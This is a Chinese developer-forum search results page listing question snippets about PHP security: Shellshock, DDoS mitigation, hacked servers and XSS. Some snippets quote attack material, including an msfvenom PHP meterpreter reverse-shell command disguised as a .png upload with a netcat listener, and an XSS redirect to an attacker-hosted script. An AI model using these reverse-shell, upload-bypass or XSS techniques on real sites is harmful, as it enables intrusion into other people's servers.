腾讯云
开发者社区
文档
建议反馈
控制台
登录/注册
首页
学习
活动
专区
工具
TVP
最新优惠活动
文章/答案/技术大牛
搜索
搜索
关闭
发布
精选内容/技术社群/优惠产品,
尽在小程序
立即前往
文章
问答
(9999+)
视频
沙龙
1
回答
防御漏洞
、
、
//unform.
php
(unprotected form) <head> <?
php
</select>
浏览 1
提问于2012-09-29
得票数 1
回答已采纳
1
回答
(或者它是CVE-2014-6271/7169的可能
攻击
载体?)
、
、
、
、
根据红帽 httpd (
攻击
向量) CGI
脚本
可能受到此问题的影响:当web服务器运行CGI
脚本
时,它使用环境变量将数据传递给
脚本
。
攻击
者可以控制这些环境变量。如果CGI
脚本
调用Bash,
脚本
可以作为httpd用户执行任意代码。mod_
php
、mod_perl和mod_python不使用环境变量,我们认为它们不受影响。mod_
php
不容易受到CVE-2014-6271和CVE-2014-7169的
攻击
,因为它不使用环
浏览 0
提问于2014-09-25
得票数 3
回答已采纳
1
回答
EXE:/usr/bin/
php
上的恶意活动CMD:/usr/bin/
php
、
检查lfd.log并注意到
脚本
的块日志:它看起来像是
脚本</e
浏览 0
提问于2013-01-10
得票数 0
回答已采纳
2
回答
使用htaccess拒绝来自ip临时访问的访问
、
、
、
我试图创建一个小
脚本
,以防止(不是防止,但减少影响)的简单ddos
攻击
。目前,我只是将我的ddosprotection.
php
文件包含在服务器上的每个页面上。如果现在有人试图在网站上发送大量请求,
脚本
就会检测到这一点,并将
攻击
者的IP写入htaccess文件。这将减少DDOS
攻击
的影响,因为
攻击
者无法访问网站本身。(是的,我知道服务器仍然需要处理一些数据,但它仍然在减少DDOS
攻击
的影响) 我现在的问题是:如果一些
浏览 6
提问于2016-08-27
得票数 1
回答已采纳
2
回答
有没有办法找出我是怎么被黑的?缺点是什么?
在第二次
攻击
时,所有表都被清除,一些
php
文件的代码被更改:/删除已创建的所有非系统Ftp帐户检查
脚本
中的任何头注入
攻击
、Sql注入
攻击
、跨站点
脚本
攻击
等,以及您的
php
.ini文件设置。 如果您的
脚本
被感染,您可能希望回滚到您的帐户的上一次良好快照备份。我试图尽我所能做到所有这些,特别是关于“头注入
攻击</
浏览 0
提问于2010-02-23
得票数 1
2
回答
需要帮助利用
php
脚本
的挑战漏洞
、
、
、
、
我试图利用Wechall.net的“停止我们”的
php
脚本
中的一个漏洞进行
攻击
,我不确定,但我想我找到了这个漏洞,但现在我不知道如何利用它。我在
PHP
.net上做了一些研究,我相信用户可以中止/关闭连接,然后
脚本
的进程就会终止,因为没有设置ignore_user_abort,所以在购买了以下
脚本
中的“域”之后,
攻击
者就可以关闭连接,而平衡也不会减少下面是挑战:易损代码的易受
攻击
代码 如何在特定时间关闭/中止连接?(竞赛窗口)
浏览 0
提问于2016-05-12
得票数 0
回答已采纳
1
回答
Dos
攻击
的无限重定向
、
我想知道无限重定向可以被用作dos
攻击
。 如果我像http://mysite.com/test.
php
?url=http://mysite.com/test.
php
?url=http://mysite.com/test.
php
?url=http://mysite.com/test.
php
?这会导致dos
攻击
吗?
浏览 0
提问于2019-08-02
得票数 1
1
回答
not服务器\ IIS配置为不运行某些文件
、
、
、
我目前有一个运行Windows 2012的and服务器,该服务器运行IIS作为其and服务器,并使用
PHP
。如何将服务器配置为只允许运行
php
脚本
,或者至少不允许
攻击
者执行某些文件类型。 问候
浏览 0
提问于2015-07-07
得票数 1
1
回答
修复在Ubuntu服务器12.10上使用Nikto发现的安全问题所需的帮助
、
、
daily&Somefile.txt& DailyDose 1.1 :list参数中的目录遍历
攻击
易受
攻击
。 找到OSVDB-3233: /图标/自述文件: Apache默认文件。/modules.
php
?(XSS)的
攻击
。SF=%22;}alert('Vulnerable');function%20x(){v%20=%22:网络Wiz论坛ver.7.01及以下版本容易受到跨站点
脚本
(XSS)的
攻击
。OSVDB-27071
浏览 0
提问于2013-03-26
得票数 3
2
回答
跟踪恶意
PHP
脚本
的来源
、
、
、
我在看一个运行Apache + mod_
php
的Linux服务器。晚上上传了一个恶意
PHP
脚本
。它是Apache用户拥有的,我认为几乎可以肯定
脚本
是由我们现有的一些
PHP
代码中的漏洞生成的。我在Apache日志中查找了
脚本
上的点击量,从中获得了
攻击
者的IP。然后我搜索这个IP的其他活动..。没什么。我还搜索了来自同一个用户代理的点击量(以防
攻击
者通过代理进行连接)。没什么。因此,在第一次
攻击
恶意
脚本
的前几分钟,我对日
浏览 0
提问于2016-04-27
得票数 2
5
回答
在
PHP
中可以忽略父
脚本
中子
脚本
的退出吗?
子
脚本
终止父
脚本
,因为它具有退出;parent.
php
child.
php
does something;?>只要我们不修改子<e
浏览 4
提问于2014-09-08
得票数 2
回答已采纳
3
回答
在基于Web的登录表单中避免Brute武力
攻击
、
PHP
脚本
处理请求,如果凭据正确,则创建会话。我的想法是让
PHP
脚本
休眠以减轻暴力
攻击
。起初它根本不睡觉,但之后我就不确定了。 表单需要
攻击
者等待多长时间才能尝试下一个密码?
浏览 0
提问于2013-04-29
得票数 8
回答已采纳
1
回答
试图安全地使用
PHP
的exec函数在服务器上运行python
脚本
、
、
引用某人对问题的评论我能做些什么来阻止黑客在我的服务器上上传文件呢?或者还有其他的对策可以让我安全地使用exec方法?
浏览 3
提问于2020-01-10
得票数 0
回答已采纳
6
回答
是否可以通过面板配置和
php
脚本
来防止DDos
攻击
?
、
、
、
我的网站受到DDos
攻击
(UDP泛滥)!有没有可能通过
php
脚本
来防止这种
攻击
?下面的代码有用吗? if (!
浏览 3
提问于2012-07-31
得票数 5
回答已采纳
1
回答
安全性维护性-这个URL试图做什么?
、
、
但是,我不明白的是,作为一个
PHP
类型的家伙,它想要做什么呢?
浏览 0
提问于2013-06-13
得票数 2
回答已采纳
1
回答
nodejs -阻止
php
脚本
攻击
尝试
、
、
我有很多关于
php
漏洞文件的请求,我想‘处理’它们。GET //phpMyAdmin/scripts/setup.
php
200 42.452 ms - 3703GET //pma/scripts/setup.
php
200 47.159 ms - 3703 GET //my
浏览 0
提问于2015-06-08
得票数 4
1
回答
PHP
Sandbox的安全问题
我正在为Web应用程序蜜大麻开发一个
PHP
沙箱。
PHP
沙箱将分析作为RFI
攻击
一部分而注入的
PHP
文件。它应该在安全的环境中运行文件并返回结果,嵌入
PHP
脚本
的输出。我们希望欺骗
攻击
者,使他们相信这是一个真正的反应,从而继续他下一步的
攻击
。 为了构建沙箱,我们使用了高级
PHP
调试器(ADP)。使用rename_function和override_function,易受
攻击
的
PHP
函数已经重写。一些函
浏览 5
提问于2012-03-25
得票数 4
回答已采纳
1
回答
帮助理解
PHP
反向Shells
、
我在
脚本
中使用msfvenom: msfvenom -p
php
/meterpreter/reverse_tcp LHOST=xxx.xxx.x.xxx LPORT=xxxx -f raw > shell.
php
我不得不将
脚本
从shell.
php
重命名为shell.
php
.png,因为该站点只允许我上传图片。上传
脚本
后,我找到图片/
脚本
的url,在
攻击
机器上设置netcat侦听器,然后使用
脚
浏览 0
提问于2020-06-20
得票数 1
1
回答
不取回
脚本
的XSS代码
、
我有一个未经验证的字段,该字段易受XSS
攻击
,到目前为止,我已经获得了下面的行,可以成功地调用我的框中的python服务器,该服务器承载了嵌入在html文件中的恶意
脚本
。也许我对这次
攻击
的理解是错误的,但我想我应该首先看到对html文件的调用,然后看到恶意JS的调用。 document.location='http:
浏览 0
提问于2018-12-30
得票数 0
回答已采纳
1
回答
提交后重新填充表单,但无法操作代码
、
、
、
、
其中的
PHP
代码用于重新填充表单,例如,如果缺少某些内容,则如下所示: <input type="text" name="first_name
php
if (isset($_POST['first_name'])) { echo "value=\"".$_POST['first_name']."\"";}
浏览 16
提问于2017-02-02
得票数 2
回答已采纳
点击加载更多
扫码
添加站长 进交流群
领取专属
10元无门槛券
手把手带您无忧上云
相关
资讯
PHP终止脚本执行
PHP FFI 允许在 PHP 脚本中嵌入 C 代码
PHP FFI 允许在 PHP 脚本中嵌入原始 C 代码
PHP FFI 允许在 PHP 脚本中嵌入原始 C 代码
php脚本执行时间配置
热门
标签
更多标签
云服务器
ICP备案
对象存储
实时音视频
云直播
活动推荐
运营活动
广告
关闭
领券